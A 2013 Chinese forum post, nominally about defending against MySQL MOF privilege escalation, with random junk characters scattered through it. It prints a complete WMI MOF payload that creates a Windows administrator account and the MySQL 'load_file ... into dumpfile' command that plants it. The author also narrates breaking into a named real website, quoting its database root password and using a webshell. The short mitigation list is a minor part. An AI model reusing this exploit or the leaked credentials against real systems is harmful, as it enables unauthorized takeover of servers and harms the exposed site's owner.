Mysql mof扩展漏洞防范方法% r9 S+ `) W) b) Y2 I
! ~$ b. ^" B9 M1 M' R& d) r+ u6 k
网上公开的一些利用代码:
( q) R& b; W$ l9 S: m: w/ B9 R. Y
#pragma namespace(“\\\\.\\root\\subscription”)0 c0 n1 g8 \) n: H
2 g) ^: S2 _+ h0 F8 iinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
; s+ }- y B' R0 q& Z+ @8 c J# u; k7 P9 q
8 U* E0 S. D0 |1 P# H
9 E u1 h& W/ j7 x- a7 v
3 {$ f' k" o% P1 {6 N% [6 p& c: [: w# D, F$ ]) Y5 x
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;& ^; L; ^5 t" ?0 S. J
从上面代码来看得出解决办法:
5 Y: n6 L% r3 u3 I/ z. j/ I( x1 d" ]! f
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
+ t2 ^/ J) o, m1 k l3 l# d
* k% J( {6 w- u) E2、禁止使用”WScript.Shel”组件, U2 m S1 v0 x, D& |
( H; p M6 _' x0 j# F8 v3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
* ~/ ?- H$ g3 m$ D2 L' ]' t6 A1 Y+ [
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
2 g: A8 j, V+ c- |- D( k& e( [( Y! _) X) F6 I3 |. M: L
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
# \ }" \! U8 m1 O+ H+ p# b- }. r/ s
$ a7 C+ J8 v9 ?, i6 w% T' B4 `2 T但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容9 l7 u3 C/ \2 l6 w: T- M
7 Q5 B1 |% Q6 Q$ y2 F: H) g
看懂了后就开始练手吧
i S& t9 M" G- K ^6 l1 r, ?6 Q; S/ D( m! l) N3 r ~3 A
http://www.webbmw.com/config/config_ucenter.php 一句话 a3 b C( K. H5 q2 k. N. U
+ F1 N) v5 U4 j. H2 m# _; K$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
) l+ I8 I5 L& c3 E4 I
1 [& a1 C# Z2 v$ m于是直接用菜刀开搞
! h0 K/ J, z0 n- @3 p
' O9 t, u0 U' h上马先$ X. B) p6 ?' R4 Y, W
7 w$ c, ? v) Z0 w+ S既然有了那些账号 之类的 于是我们就执行吧……./ l7 Y3 [" P, W) d/ m p1 o8 v1 m3 j
/ k& g0 Y( y; X5 b1 L* ~
小小的说下 x4 u. d! w: k9 M
' c4 F; C2 m- x; v3 C在这里第1次执行未成功 原因未知4 @7 q& f/ }4 J1 u$ k+ h. W
$ s! E' |: }4 V2 m7 P我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
2 l$ v* |4 w' T0 D* [8 |2 Q8 ~# ] W& L# }5 V
#pragma namespace(“\\\\.\\root\\subscription”)
3 r+ d. n+ j6 q8 o: d/ t% q/ ~' W2 @9 D( M) }& C
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
$ O! c4 X; U- `" F- {1 c. x) z2 o" E
我是将文件放到C:\WINDOWS\temp\1.mof
9 U* {+ R" _& }6 f( L! U: ^6 ^$ X7 K5 W
所以我们就改下执行的代码; p, G' {! |# U9 e# E' z+ L
5 b' i) t! G6 G" O3 G' Oselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
7 Z' K! w9 D: H3 R+ ~; x+ N
6 N+ d- X2 z, }# q2 }( l ?( C, E! p2 B' [
7 L. z: {, X: f3 \: p' q( `; X但是 你会发现账号还是没有躺在那里。。
1 v/ p; k2 ]$ h2 R0 D" v
0 T' g* z! \ q( F于是我就感觉蛋疼
- m; r8 e3 a8 ~ o7 }: ^9 [
% C3 |6 \5 h8 n) w4 D2 E就去一个一个去执行 但是执行到第2个 mysql时就成功了………
- F7 J1 E4 o' B y3 Y/ U' e( W: E: e: n
. U, u3 z: F. Z0 {
0 U) \8 W8 z8 T6 ]* I但是其他库均不成功…+ G4 d) Z; v- I: w
/ F7 `2 T6 [8 ^: |* L. j
我就很费解呀 到底为什么不成功求大牛解答…7 c2 u4 j; G! I/ s1 G
( G8 F' \. W' A/ n
) u5 ^( Q* Z _% D' O$ ^! o& ^6 t% W* a; {; d( O
|
发表于 2013-1-4 19:49:49
收藏
支持
反对